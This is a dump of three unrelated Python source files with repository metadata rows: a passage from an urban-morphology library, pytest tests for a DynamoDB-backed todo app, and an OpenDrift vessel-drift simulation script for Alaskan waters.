                                rights.append(minimal)
                        else:
                            # Single crossing: `ix` is the tick index from
                            # enumerate(duo) (0 = first side, 1 = second).
                            if ix == 0:
                                lefts.append(
                                    true_int[0].distance(Point(tick.coords[-1]))
                                )
                            else:
                                rights.append(
                                    true_int[0].distance(Point(tick.coords[-1]))
                                )

                        if heights is not None:
                            # Record the height of the building nearest to
                            # the street-side end of this tick.
                            indices = {}
                            for idx, row in get_height.iterrows():
                                dist = row.geometry.distance(Point(tick.coords[-1]))
                                indices[idx] = dist
                            minim = min(indices, key=indices.get)
                            m_heights.append(right.loc[minim][heights])

            # Openness: share of half-ticks that did NOT hit a building.
            openness = (len(lefts) + len(rights)) / len(ticks * 2)
            openness_list.append(1 - openness)

            # Width: twice the mean hit distance; missing sides are filled
            # with the theoretical maximum (tick_length / 2 per side).
            if rights and lefts:
                results_list.append(2 * np.mean(lefts + rights))
                deviations_list.append(np.std(lefts + rights))
            elif not lefts and rights:
                results_list.append(2 * np.mean([np.mean(rights), tick_length / 2]))
                deviations_list.append(np.std(rights))
            elif not rights and lefts:
                results_list.append(2 * np.mean([np.mean(lefts), tick_length / 2]))
                deviations_list.append(np.std(lefts))
            else:
                results_list.append(tick_length)
                deviations_list.append(0)

            if heights is not None:
                if m_heights:
                    heights_list.append(np.mean(m_heights))
                    heights_deviations_list.append(np.std(m_heights))
                else:
                    heights_list.append(0)
                    heights_deviations_list.append(0)

        self.w = pd.Series(results_list, index=left.index)
        self.wd = pd.Series(deviations_list, index=left.index)
        self.o = pd.Series(openness_list, index=left.index)
        if heights is not None:
            self.h = pd.Series(heights_list, index=left.index)
            self.hd = pd.Series(heights_deviations_list, index=left.index)
            self.p = self.h / self.w

    # http://wikicode.wikidot.com/get-angle-of-line-between-two-points
    # https://glenbambrick.com/tag/perpendicular/
    # angle between two points
    def _getAngle(self, pt1, pt2):
        """Bearing in degrees of the line from ``pt1`` to ``pt2``."""
        x_diff = pt2.x - pt1.x
        y_diff = pt2.y - pt1.y
        return math.degrees(math.atan2(y_diff, x_diff))

    # start and end points of chainage tick
    # get the first end point of a tick
    def _getPoint1(self, pt, bearing, dist):
        """Point at ``dist`` from ``pt``, perpendicular to ``bearing``."""
        angle = bearing + 90
        bearing = math.radians(angle)
        x = pt.x + dist * math.cos(bearing)
        y = pt.y + dist * math.sin(bearing)
        return Point(x, y)

    # get the second end point of a tick
    def _getPoint2(self, pt, bearing, dist):
        """Point at ``dist`` from ``pt`` along ``bearing``."""
        bearing = math.radians(bearing)
        x = pt.x + dist * math.cos(bearing)
        y = pt.y + dist * math.sin(bearing)
        return Point(x, y)
class WeightedCharacter:
    """Compute a character weighted by object areas within a neighbourhood.

    The character is averaged over the element and its neighbours (defined
    by ``spatial_weights``), each contribution weighted by its area:

    .. math::
        \\frac{\\sum_{i=1}^{n} {character_{i} * area_{i}}}{\\sum_{i=1}^{n} area_{i}}

    Adapted from :cite:`dibble2017`.

    Parameters
    ----------
    gdf : GeoDataFrame
        GeoDataFrame containing objects to analyse
    values : str, list, np.array, pd.Series
        column name, ``np.array``, or ``pd.Series`` holding the character to be weighted
    spatial_weights : libpysal.weights
        spatial weights matrix - If None, Queen contiguity matrix of set order will be
        calculated based on left.
    unique_id : str
        name of the column with unique id used as ``spatial_weights`` index.
    areas : str, list, np.array, pd.Series (default None)
        column name, ``np.array``, or ``pd.Series`` holding the area values

    Attributes
    ----------
    series : Series
        Series containing resulting values
    gdf : GeoDataFrame
        original GeoDataFrame
    values : GeoDataFrame
        Series containing used values
    areas : GeoDataFrame
        Series containing used areas
    sw : libpysal.weights
        spatial weights matrix
    id : Series
        Series containing used unique ID

    Examples
    --------
    >>> sw = libpysal.weights.DistanceBand.from_dataframe(tessellation_df, threshold=100, silence_warnings=True)
    >>> buildings_df['w_height_100'] = momepy.WeightedCharacter(buildings_df, values='height', spatial_weights=sw,
                                                                unique_id='uID').series
    100%|██████████| 144/144 [00:00<00:00, 361.60it/s]
    """

    def __init__(self, gdf, values, spatial_weights, unique_id, areas=None):
        self.gdf = gdf
        self.sw = spatial_weights
        self.id = gdf[unique_id]

        data = gdf.copy()
        # Accept either column names or array-likes for areas and values.
        if areas is None:
            areas = gdf.geometry.area
        if not isinstance(areas, str):
            data["mm_a"] = areas
            areas = "mm_a"
        if not isinstance(values, str):
            data["mm_vals"] = values
            values = "mm_vals"
        self.areas = data[areas]
        self.values = data[values]

        # Re-index by the unique id for neighbour lookups via .loc.
        data = data.set_index(unique_id)[[values, areas]]

        results_list = []
        for index in tqdm(data.index, total=data.shape[0]):
            if index not in spatial_weights.neighbors.keys():
                # id missing from the weights matrix: no neighbourhood known.
                results_list.append(np.nan)
                continue
            # The element itself is part of its own neighbourhood.
            neighbours = spatial_weights.neighbors[index].copy()
            if neighbours:
                neighbours.append(index)
            else:
                neighbours = [index]
            subset = data.loc[neighbours]
            weighted_sum = sum(subset[values] * subset[areas])
            results_list.append(weighted_sum / sum(subset[areas]))

        self.series = pd.Series(results_list, index=gdf.index)
class CoveredArea:
    """Compute the total area covered by an element and its neighbours.

    Neighbourhoods are defined by ``spatial_weights``; the element's own
    area is always included in the sum.

    Parameters
    ----------
    gdf : GeoDataFrame
        GeoDataFrame containing Polygon geometry
    spatial_weights : libpysal.weights
        spatial weights matrix
    unique_id : str
        name of the column with unique id used as ``spatial_weights`` index.

    Attributes
    ----------
    series : Series
        Series containing resulting values
    gdf : GeoDataFrame
        original GeoDataFrame
    sw : libpysal.weights
        spatial weights matrix
    id : Series
        Series containing used unique ID

    Examples
    --------
    >>> sw = momepy.sw_high(k=3, gdf=tessellation_df, ids='uID')
    >>> tessellation_df['covered3steps'] = mm.CoveredArea(tessellation_df, sw, 'uID').series
    100%|██████████| 144/144 [00:00<00:00, 549.15it/s]
    """

    def __init__(self, gdf, spatial_weights, unique_id):
        self.gdf = gdf
        self.sw = spatial_weights
        self.id = gdf[unique_id]

        # Areas indexed by the unique id for neighbour lookups via .loc.
        area = gdf.set_index(unique_id).geometry.area

        results_list = []
        for index in tqdm(area.index, total=area.shape[0]):
            if index not in spatial_weights.neighbors.keys():
                # id missing from the weights matrix: no neighbourhood known.
                results_list.append(np.nan)
                continue
            # The element itself is part of its own neighbourhood.
            neighbours = spatial_weights.neighbors[index].copy()
            if neighbours:
                neighbours.append(index)
            else:
                neighbours = [index]
            results_list.append(sum(area.loc[neighbours]))

        self.series = pd.Series(results_list, index=gdf.index)
class PerimeterWall:
    """
    Calculate the perimeter wall length of each joined structure.

    Adjacent buildings (as captured by ``spatial_weights``) are dissolved
    into one structure; every building in that structure receives the
    exterior length of the dissolved footprint.

    Parameters
    ----------
    gdf : GeoDataFrame
        GeoDataFrame containing objects to analyse
    spatial_weights : libpysal.weights, optional
        spatial weights matrix - If None, Queen contiguity matrix will be calculated
        based on gdf. It is to denote adjacent buildings (note: based on index, not ID).

    Attributes
    ----------
    series : Series
        Series containing resulting values
    gdf : GeoDataFrame
        original GeoDataFrame
    sw : libpysal.weights
        spatial weights matrix

    Examples
    --------
    >>> buildings_df['wall_length'] = mm.PerimeterWall(buildings_df).series
    Calculating spatial weights...
    Spatial weights ready...
    100%|██████████| 144/144 [00:00<00:00, 4171.39it/s]

    Notes
    -----
    It might take a while to compute this character.
    """

    def __init__(self, gdf, spatial_weights=None):
        self.gdf = gdf
        if spatial_weights is None:
            print("Calculating spatial weights...")
            from libpysal.weights import Queen
            spatial_weights = Queen.from_dataframe(gdf, silence_warnings=True)
            print("Spatial weights ready...")
        self.sw = spatial_weights
        # maps each positional id to the wall length of its joined structure
        walls = {}
        labels = pd.Series(spatial_weights.component_labels, index=range(len(gdf)))
        geom = gdf.geometry
        n = gdf.shape[0]
        for i in tqdm(range(n), total=n):
            # already resolved as part of an earlier structure
            if i in walls:
                continue
            members = labels[labels == spatial_weights.component_labels[i]].index
            # buffer to avoid multipolygons where buildings touch by corners only
            dissolved = geom.iloc[members].buffer(0.01).unary_union
            length = dissolved.exterior.length
            for member in members:
                walls[member] = length
        self.series = pd.Series(
            [walls[i] for i in tqdm(range(n), total=n)], index=gdf.index
        )
class SegmentsLength:
    """
    Calculate the cumulative and/or mean length of segments.

    Length of segments within set topological distance from each of them.
    Reached topological distance should be captured by ``spatial_weights``. If ``mean=False`` it
    will compute sum of length, if ``mean=True`` it will compute sum and mean.

    Parameters
    ----------
    gdf : GeoDataFrame
        GeoDataFrame containing streets (edges) to analyse
    spatial_weights : libpysal.weights, optional
        spatial weights matrix - If None, Queen contiguity matrix will be calculated
        based on streets (note: spatial_weights should be based on index, not unique ID).
    mean : boolean, optional
        If mean=False it will compute sum of length, if mean=True it will compute
        sum and mean

    Attributes
    ----------
    series : Series
        Series containing resulting total lengths (alias of ``sum``)
    mean : Series
        Series containing resulting mean lengths (set only if ``mean=True``)
    sum : Series
        Series containing resulting total lengths
    gdf : GeoDataFrame
        original GeoDataFrame
    sw : libpysal.weights
        spatial weights matrix

    Examples
    --------
    >>> streets_df['length_neighbours'] = mm.SegmentsLength(streets_df, mean=True).mean
    Calculating spatial weights...
    Spatial weights ready...
    """

    def __init__(self, gdf, spatial_weights=None, mean=False):
        self.gdf = gdf
        if spatial_weights is None:
            print("Calculating spatial weights...")
            from libpysal.weights import Queen
            spatial_weights = Queen.from_dataframe(gdf, silence_warnings=True)
            print("Spatial weights ready...")
        self.sw = spatial_weights
        lengths = gdf.geometry.length
        sums = []
        means = []
        for index in tqdm(gdf.index, total=gdf.shape[0]):
            neighbours = spatial_weights.neighbors[index].copy()
            # include the segment itself in its own neighbourhood
            if neighbours:
                neighbours.append(index)
            else:
                neighbours = [index]
            # NOTE(review): positional lookup — assumes spatial_weights (and
            # gdf.index) are based on 0..n-1 positions, as documented above
            dims = lengths.iloc[neighbours]
            if mean:
                means.append(np.mean(dims))
            sums.append(sum(dims))
        self.series = self.sum = pd.Series(sums, index=gdf.index)
        if mean:
            self.mean = pd.Series(means, index=gdf.index)
| 33.798604 | 146 | 0.578643 | 3,836 | 33,900 | 5.02633 | 0.125912 | 0.041388 | 0.030808 | 0.025725 | 0.583943 | 0.545822 | 0.494321 | 0.458586 | 0.423733 | 0.388777 | 0 | 0.018534 | 0.323569 | 33,900 | 1,002 | 147 | 33.832335 | 0.820113 | 0.430885 | 0 | 0.434466 | 0 | 0 | 0.034149 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038835 | false | 0 | 0.024272 | 0 | 0.101942 | 0.009709 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44b618144cd7630733cffae5d1cb9672a7fba58e | 6,430 | py | Python | tests/test_db.py | craymaru/serverless-todo-backend | 5f0bd32b321e783fbdcab2714ccd0cdee30f6156 | [
"MIT"
] | 1 | 2020-12-08T09:16:27.000Z | 2020-12-08T09:16:27.000Z | tests/test_db.py | craymaru/serverless-todo-backend | 5f0bd32b321e783fbdcab2714ccd0cdee30f6156 | [
"MIT"
] | null | null | null | tests/test_db.py | craymaru/serverless-todo-backend | 5f0bd32b321e783fbdcab2714ccd0cdee30f6156 | [
"MIT"
] | null | null | null | import operator
import pytest
from chalice import NotFoundError
import app
from tests.testdata.ddb_items import TESTDATA_DDB_ITEMS
DEFAULT_USERNAME = 'default'
class TestDB:
    """Shared base class grouping all DB-layer test suites."""
class TestListAllItems(TestDB):
    def test_Return_all_items(self, mock):
        """list_all_items: returns every item stored in the table."""
        mock.table.put_items(TESTDATA_DDB_ITEMS)
        stored = app.get_app_db().list_all_items()
        assert stored == TESTDATA_DDB_ITEMS
class TestListItems(TestDB):
    """Tests for ``list_items`` (per-user listing with optional query)."""

    @staticmethod
    def _sorted_by_uid(items):
        # Helper: impose a stable order so list comparisons are deterministic.
        return sorted(items, key=operator.itemgetter('uid'))

    def test_Return_items_by_username(self, mock):
        """list_items: returns every item owned by the 'default' user."""
        mock.table.put_items(TESTDATA_DDB_ITEMS)
        actual = app.get_app_db().list_items(query='', username=DEFAULT_USERNAME)
        expected = [item for item in TESTDATA_DDB_ITEMS
                    if item['username'] == DEFAULT_USERNAME]
        assert self._sorted_by_uid(actual) == self._sorted_by_uid(expected)

    @pytest.mark.parametrize('query', ['🐈', '🍆'])
    def test_Return_items_by_query(self, query, mock):
        """list_items: returns only the user's items whose subject or description matches the query."""
        mock.table.put_items(TESTDATA_DDB_ITEMS)
        actual = app.get_app_db().list_items(query=query, username=DEFAULT_USERNAME)
        expected = [item for item in TESTDATA_DDB_ITEMS
                    if item['username'] == DEFAULT_USERNAME
                    and (query in item['subject'] or query in item['description'])]
        assert self._sorted_by_uid(actual) == self._sorted_by_uid(expected)
class TestAddItem(TestDB):
    """Tests for ``add_item``."""

    @pytest.mark.parametrize('item', TESTDATA_DDB_ITEMS)
    def test_Return_uid_str_cace_subject_description(self, item):
        """add_item: with subject and description, returns the new item's uid."""
        actual = app.get_app_db().add_item(
            subject=item['subject'],
            description=item['description'],
            username=DEFAULT_USERNAME)
        # add_item returns the generated uid string (36 chars, UUID4 format).
        assert isinstance(actual, str)
        assert len(actual) == 36

    # The following test case is intentionally disabled (2020-11-30):
    #
    # Since 2020-05-18 Amazon DynamoDB accepts empty strings ('') for
    # string/binary attribute values. The moto mock of DynamoDB used in
    # these tests has not caught up with that change yet and still rejects
    # empty strings, so running this case raises an error.
    # Re-enable it once moto supports the new behaviour.
    #
    # @pytest.mark.parametrize('item', TESTDATA_DDB_ITEMS)
    # def test_Return_uid_str_cace_subject_only(self, item):
    #     """add_item: with subject only, returns the new item's uid."""
    #     actual = app.get_app_db().add_item(
    #         subject=item['subject'],
    #         username=DEFAULT_USERNAME)
    #     assert isinstance(actual, str)
    #     assert len(actual) == 36

    def test_Raise_case_description_only(self):
        """add_item: description without subject raises TypeError."""
        with pytest.raises(TypeError):
            app.get_app_db().add_item(
                description='',
                username=DEFAULT_USERNAME)
class TestGetItem(TestDB):
    @pytest.mark.parametrize("item", TESTDATA_DDB_ITEMS)
    def test_Return_item(self, mock, item):
        """get_item: when the uid exists, the stored item is returned."""
        mock.table.put_items(TESTDATA_DDB_ITEMS)
        fetched = app.get_app_db().get_item(
            uid=item['uid'], username=item['username'])
        assert fetched == item

    def test_Raise_NotFoundError_case_uid_not_exist(self, mock):
        """get_item: an unknown uid raises NotFoundError."""
        with pytest.raises(NotFoundError):
            app.get_app_db().get_item("_NOT_EXIST_UID", username=DEFAULT_USERNAME)
class TestDeleteItem(TestDB):
    @pytest.mark.parametrize("item", TESTDATA_DDB_ITEMS)
    def test_Return_uid_str(self, mock, item):
        """delete_item: when the uid exists, the deleted item's uid is returned."""
        mock.table.put_items([item])
        deleted_uid = app.get_app_db().delete_item(
            item['uid'], username=item['username'])
        assert deleted_uid == item['uid']

    def test_Raise_NotFoundError_case_uid_not_exist(self, mock):
        """delete_item: an unknown uid raises NotFoundError."""
        with pytest.raises(NotFoundError):
            app.get_app_db().delete_item("_NOT_EXIST_UID", username=DEFAULT_USERNAME)
class TestUpdateItem(TestDB):
    @pytest.mark.parametrize("item", TESTDATA_DDB_ITEMS)
    def test_Return_uid_case_all_attributes(self, mock, item):
        """update_item: updating every attribute returns the item's uid."""
        mock.table.put_items(TESTDATA_DDB_ITEMS)
        returned_uid = app.get_app_db().update_item(
            uid=item['uid'],
            subject=item['subject'] + "_updated",
            description=item['description'] + "_updated",
            state=item['state'],
            username=item['username'])
        assert returned_uid == item['uid']

    @pytest.mark.parametrize("item", TESTDATA_DDB_ITEMS)
    def test_Return_uid_case_subject_only(self, mock, item):
        """update_item: updating only the subject returns the item's uid."""
        mock.table.put_items(TESTDATA_DDB_ITEMS)
        returned_uid = app.get_app_db().update_item(
            uid=item['uid'],
            subject=item['subject'] + "_updated",
            username=item['username'])
        assert returned_uid == item['uid']

    @pytest.mark.parametrize("item", TESTDATA_DDB_ITEMS)
    def test_Return_uid_case_description_only(self, mock, item):
        """update_item: updating only the description returns the item's uid."""
        mock.table.put_items(TESTDATA_DDB_ITEMS)
        returned_uid = app.get_app_db().update_item(
            uid=item['uid'],
            description=item['description'] + "_updated",
            username=item['username'])
        assert returned_uid == item['uid']

    @pytest.mark.parametrize("item", TESTDATA_DDB_ITEMS)
    def test_Return_uid_case_state_only(self, mock, item):
        """update_item: updating only the state returns the item's uid."""
        mock.table.put_items(TESTDATA_DDB_ITEMS)
        returned_uid = app.get_app_db().update_item(
            uid=item['uid'],
            state=item['state'],
            username=item['username'])
        assert returned_uid == item['uid']

    def test_Raise_NotFoundError_case_uid_not_exist(self, mock):
        """update_item: an unknown uid raises NotFoundError."""
        with pytest.raises(NotFoundError):
            app.get_app_db().update_item("_NOT_EXIST_UID", username=DEFAULT_USERNAME)
| 38.502994 | 85 | 0.671851 | 719 | 6,430 | 5.724618 | 0.154381 | 0.056122 | 0.081633 | 0.040087 | 0.685374 | 0.652818 | 0.604956 | 0.587707 | 0.566812 | 0.566812 | 0 | 0.003942 | 0.210886 | 6,430 | 166 | 86 | 38.73494 | 0.806858 | 0.196112 | 0 | 0.524272 | 0 | 0 | 0.060397 | 0 | 0 | 0 | 0 | 0 | 0.106796 | 1 | 0.135922 | false | 0.009709 | 0.048544 | 0 | 0.252427 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44b63f8dd16194a8fc997b6be8fdf43178a1bc65 | 11,651 | py | Python | src/vessel-drift-analysis/scripts/simulations/launch_drift.py | yosoyjay/project-nps-vessel-drift | 1cdc14ef87db31fa03b0c3bdc1d60c332727ef57 | [
"MIT"
] | null | null | null | src/vessel-drift-analysis/scripts/simulations/launch_drift.py | yosoyjay/project-nps-vessel-drift | 1cdc14ef87db31fa03b0c3bdc1d60c332727ef57 | [
"MIT"
] | null | null | null | src/vessel-drift-analysis/scripts/simulations/launch_drift.py | yosoyjay/project-nps-vessel-drift | 1cdc14ef87db31fa03b0c3bdc1d60c332727ef57 | [
"MIT"
] | null | null | null | #!python
"""Launch vessel drift simulations.
Methodology
-----------
For every week with forcing data, simulated vessels are launched from every cell where
a vessel was present in the AIS data.
The drift angle (up to 60 deg.), windage scaling (2% - 10% of 10 m), and left/right
direction is randomly assigned per simulated vessel.
"""
import datetime
import logging
import time
from dataclasses import dataclass
from pathlib import Path
from typing import List
import numpy as np
import rasterio
from opendrift.models.basemodel import OpenDriftSimulation
from opendrift.models.oceandrift import LagrangianArray
from opendrift.readers import reader_netCDF_CF_generic, reader_shape
from rasterio import warp
logging.basicConfig(level=logging.WARNING)
RANGE_LIMIT_RADS = 60 * np.pi / 180
TIF_DIR = '/mnt/store/data/assets/nps-vessel-spills/ais-data/ais-data-2015-2020/processed_25km/2019/epsg4326'
class Vessel(LagrangianArray):
    """Extend LagrangianArray for use with Alaskan Vessel Drift Project."""

    # Per-element attributes added on top of the base LagrangianArray:
    # - wind_scale: multiplier applied to wind speed felt by the vessel
    #   (assigned randomly per element in AlaskaDrift.seed_elements)
    # - wind_offset: angular offset (radians) added to the wind direction
    #   (assigned randomly within +-RANGE_LIMIT_RADS in seed_elements)
    variables = LagrangianArray.add_variables([
        (
            'wind_scale',
            {
                'dtype': np.float32,
                'units': '1',
                'default': 1
            }
        ),
        (
            'wind_offset',
            {
                'dtype': np.float32,
                'units': '1',
                'default': 1
            }
        )
    ])
class AlaskaDrift(OpenDriftSimulation):
    """OpenDrift model for drifting vessels in Alaskan waters.

    Elements are advected by a randomly scaled/rotated wind leeway,
    surface currents and sea ice, and are deactivated on stranding.
    """

    ElementType = Vessel

    # Environment fields this model requires from its readers.
    required_variables = [
        'x_wind',
        'y_wind',
        'eastward_sea_water_velocity',
        'northward_sea_water_velocity',
        'eastward_sea_ice_velocity',
        'northward_sea_ice_velocity',
        'sea_ice_area_fraction',
        'land_binary_mask'
    ]

    def seed_elements(
            self,
            lon,
            lat,
            radius=0,
            number=None,
            time=None,
            seed=187,
            range_limit_rads=RANGE_LIMIT_RADS,
            **kwargs
    ):
        """Seed vessels with randomized per-element windage and drift angle.

        NOTE(review): the ``seed`` parameter is accepted but never used —
        the RNG is not seeded here, so runs are not reproducible. Confirm
        whether reproducibility was intended.
        """
        if number is None:
            number = self.get_config('seed:number_of_elements')
        # drift is going to be a random value between 2% - 10% of wind
        # (b - a) * random_sample + a
        # a = 0.02
        # b = 0.1
        wind_scale = (0.1 - 0.02) * np.random.random_sample((number,)) + 0.02
        # offset is -60 deg. to 60 deg.
        # a = -60
        # b = 60
        # (60 - (-60)) * random_sample + (-60)
        wind_offset = (range_limit_rads + range_limit_rads) * np.random.random_sample((number,)) - range_limit_rads  # noqa
        super(AlaskaDrift, self).seed_elements(
            lon=lon,
            lat=lat,
            radius=radius,
            number=number,
            time=time,
            wind_scale=wind_scale,
            wind_offset=wind_offset,
            **kwargs
        )

    def update(self):
        """Update ship position taking into account wind, currents, stokes, and ice."""
        # Inspired by `advect_oil`
        if hasattr(self.environment, 'sea_ice_area_fraction'):
            ice_area_fraction = self.environment.sea_ice_area_fraction
            # Above 70%–80% ice cover, the oil moves entirely with the ice.
            # k_ice ramps linearly from 0 (<=30% cover) to 1 (>=80% cover).
            k_ice = (ice_area_fraction - 0.3) / (0.8 - 0.3)
            k_ice[ice_area_fraction < 0.3] = 0
            k_ice[ice_area_fraction > 0.8] = 1
            # NOTE(review): factor_stokes is computed but never used below —
            # there is no Stokes-drift advection step in this method.
            factor_stokes = (0.7 - ice_area_fraction) / 0.7
            factor_stokes[ice_area_fraction > 0.7] = 0
        else:
            # No ice information available: full wind/current forcing.
            k_ice = 0
            factor_stokes = 1
        # 1. update wind
        windspeed = np.sqrt(self.environment.x_wind**2 + self.environment.y_wind**2)
        windspeed *= self.elements.wind_scale
        # update angle using random offset +- 60 deg
        # windir is in rads, so need to convert
        winddir = np.arctan2(self.environment.y_wind, self.environment.x_wind)
        winddir += self.elements.wind_offset
        wind_x = windspeed * np.cos(winddir)
        wind_y = windspeed * np.sin(winddir)
        # Scale wind by ice factor
        wind_x = wind_x * (1 - k_ice)
        wind_y = wind_y * (1 - k_ice)
        self.update_positions(wind_x, wind_y)
        # 2. update with sea_water_velocity
        # This assumes x_sea_water_velocity and not eastward_sea_water_velocity...
        #self.advect_ocean_current(factor=1 - k_ice)
        self.update_positions(
            self.environment.eastward_sea_water_velocity * (1 - k_ice),
            self.environment.northward_sea_water_velocity * (1 - k_ice)
        )
        # 3. Advect with ice
        self.advect_with_sea_ice(factor=k_ice)
        # Deactivate elements that hit the land mask
        self.deactivate_elements(
            self.environment.land_binary_mask == 1,
            reason='ship stranded'
        )
@dataclass
class SimulationConfig:
    """Configuration for a single OpenDrift simulation"""
    start_date: datetime.datetime  # when the drifters are released
    readers: List  # OpenDrift readers providing forcing (currents/ice, wind, landmask)
    number: int  # how many times the full set of release points is seeded (see run_sims_for_date)
    radius: float = 25000  # this is meters from given x,y point
    time_step: int = 900  # model time step (seconds)
    time_step_output: int = 3600  # output interval (seconds)
    duration: datetime.timedelta = datetime.timedelta(days=7)  # simulated drift length
    outfile: str = None  # base name of the NetCDF output file
    loglevel: int = logging.INFO  # OpenDrift logger verbosity
def lonlat_from_tif(date, tif_file, dst_crs=rasterio.crs.CRS.from_epsg(4326)):
    """Return (lon, lat) arrays for every TIFF cell with value > 0.

    ``date`` is accepted for call-site compatibility but is not used.
    Longitudes are returned in the [0, 360) convention.
    """
    with rasterio.open(tif_file) as src:
        # row/col indices of the non-zero cells of band 1
        nonzero = np.argwhere(src.read(1))
        xs, ys = src.xy(nonzero[:, 0], nonzero[:, 1])
        lon, lat = warp.transform(src.crs, dst_crs, xs, ys)
    # shift longitudes from [-180, 180] to [0, 360]
    return np.array(lon) % 360, np.array(lat)
# ~2 min per test
def run_sims_for_date(run_config, tif_dir=TIF_DIR):
    """Run one drift simulation per vessel type for ``run_config.start_date``.

    Release points come from the month's AIS raster for each vessel type;
    results are written to ``<vessel_type>_<run_config.outfile>``.
    """
    vessel_types = ['cargo', 'other', 'passenger', 'tanker']
    # Run simulation using data for start date for every vessel type
    month = run_config.start_date.month
    # NOTE(review): tif_files is collected and sorted but never used below.
    tif_files = list(Path(tif_dir).glob('*.tif'))
    tif_files.sort()
    base_fname = run_config.outfile
    for vessel_type in vessel_types:
        try:
            tif_file = list(Path(tif_dir).glob(f'{vessel_type}_2019{month:02}01-2019*.tif'))[0]
        except IndexError:
            # December rasters end in 2020, so retry with that pattern.
            if month == 12:
                tif_file = list(Path(tif_dir).glob(f'{vessel_type}_2019{month:02}01-2020*.tif'))[0]
            else:
                raise IndexError(f"No AIS data found for {month}")
        logging.info(f'Starting simulation preparation for {tif_file=}')
        # derive the vessel type back from the matched file name
        vessel_type = tif_file.name.split('.')[0].split('_')[0]
        # prepend out name with vessel type
        outfile = vessel_type + '_' + base_fname
        # release points from each ais location where a vessel was in the past
        lons, lats = lonlat_from_tif(run_config.start_date, tif_file)
        # launch vessel simulation
        vessel_sim = AlaskaDrift(loglevel=run_config.loglevel)
        vessel_sim.add_reader(run_config.readers)
        # seed the full set of release points run_config.number times
        for i in range(run_config.number):
            vessel_sim.seed_elements(
                lon=lons,
                lat=lats,
                time=run_config.start_date,
                number=len(lons),
                radius=run_config.radius
            )
        # Disabling the automatic GSHHG landmask
        vessel_sim.set_config('general:use_auto_landmask', False)
        # Backup velocities
        vessel_sim.set_config('environment:fallback:sea_ice_area_fraction', 0)
        vessel_sim.set_config('environment:fallback:northward_sea_ice_velocity', 0)
        vessel_sim.set_config('environment:fallback:eastward_sea_ice_velocity', 0)
        vessel_sim.set_config('environment:fallback:northward_sea_water_velocity', 0)
        vessel_sim.set_config('environment:fallback:eastward_sea_water_velocity', 0)
        vessel_sim.set_config('environment:fallback:x_wind', 0)
        vessel_sim.set_config('environment:fallback:y_wind', 0)
        vessel_sim.run(
            time_step=run_config.time_step,
            time_step_output=run_config.time_step_output,
            duration=run_config.duration,
            outfile=outfile
        )
def run_simulations(
        days=7,
        number=50,
        radius=5000,
        timestep=900,
        output_timestep=3600,
        tif_dir=TIF_DIR,
        loglevel=logging.INFO
):
    """Launch a drift simulation every ``days`` days across 2019.

    Forcing readers (HYCOM currents/ice, NAM winds, 0-360 landmask) are
    built once and shared across all launch dates. A failure on one date
    is logged and the loop continues with the next date.
    """
    # start date possible to launch drifter, limited by availability of HYCOM data
    start_date = datetime.datetime(2019, 1, 8)
    # last date possible to launch drifter, limited by availability of NAM data (2019-12-17)
    last_date = datetime.datetime(2019, 12, 10)
    date = start_date
    duration = datetime.timedelta(days=days)
    # currents + ice
    hycom_file = '/mnt/store/data/assets/nps-vessel-spills/forcing-files/hycom/final-files/hycom.nc'
    # Provide a name mapping to work with package methods:
    name_map = {
        'eastward_sea_water_velocity': 'x_sea_water_velocity',
        'northward_sea_water_velocity': 'y_sea_water_velocity',
        'siu': 'x_sea_ice_velocity',
        'siv': 'y_sea_ice_velocity',
    }
    hycom_reader = reader_netCDF_CF_generic.Reader(hycom_file, standard_name_mapping=name_map)
    # winds
    fname = '/mnt/store/data/assets/nps-vessel-spills/forcing-files/nam/regrid/nam.nc'
    nam_reader = reader_netCDF_CF_generic.Reader(fname)
    # land - cannot use default landmask as it is -180, 180
    # Instead, we use the same landmask with lons shifted to 0, 360
    fname = '/mnt/store/data/assets/nps-vessel-spills/sim-scripts/drift/world_0_360.shp'
    reader_landmask = reader_shape.Reader.from_shpfiles(fname)
    # Reader order matters. first reader sets the projection for the simulation.
    readers = [hycom_reader, nam_reader, reader_landmask]
    sim_start_time = time.perf_counter()
    while date <= last_date:
        try:
            logging.info(f'simulation started for {date:%Y-%m-%d}')
            start_time = time.perf_counter()
            output_fname = f'alaska_drift_{date:%Y-%m-%d}.nc'
            config = SimulationConfig(
                date,
                readers,
                number,
                radius,
                timestep,
                output_timestep,
                duration,
                output_fname,
                loglevel
            )
            run_sims_for_date(config, tif_dir)
            end_time = time.perf_counter()
            total_time = int(end_time - start_time)
            logging.info(f'simulation complete {total_time} s')
        except Exception as e:
            # Broad catch on purpose: one bad date must not abort the batch.
            logging.warning(f'simulation failed for {date:%Y-%m-%d}')
            logging.warning(str(e))
        date = date + datetime.timedelta(days=days)
    sim_end_time = time.perf_counter()
    total_sim_time = int(sim_end_time - sim_start_time)
    logging.info(f'total sim time {total_sim_time} s')
def main():
    """Command-line entry point: parse options and launch the drift runs."""
    import argparse

    parser = argparse.ArgumentParser()
    parser.add_argument(
        '-n', '--number', type=int, default=50,
        help='Number of vessels to launch per simulation'
    )
    parser.add_argument(
        '-r', '--radius', type=float, default=25000,
        help='Max distance from release point to launch vessel (in meters)'
    )
    parser.add_argument(
        '-a', '--ais', type=str, default=TIF_DIR,
        help='Path to dir with AIS tifs for release points'
    )
    options = parser.parse_args()

    run_simulations(
        days=7,
        number=options.number,
        radius=options.radius,
        timestep=900,
        output_timestep=86400,
        tif_dir=options.ais,
        loglevel=logging.INFO
    )


if __name__ == '__main__':
    main()
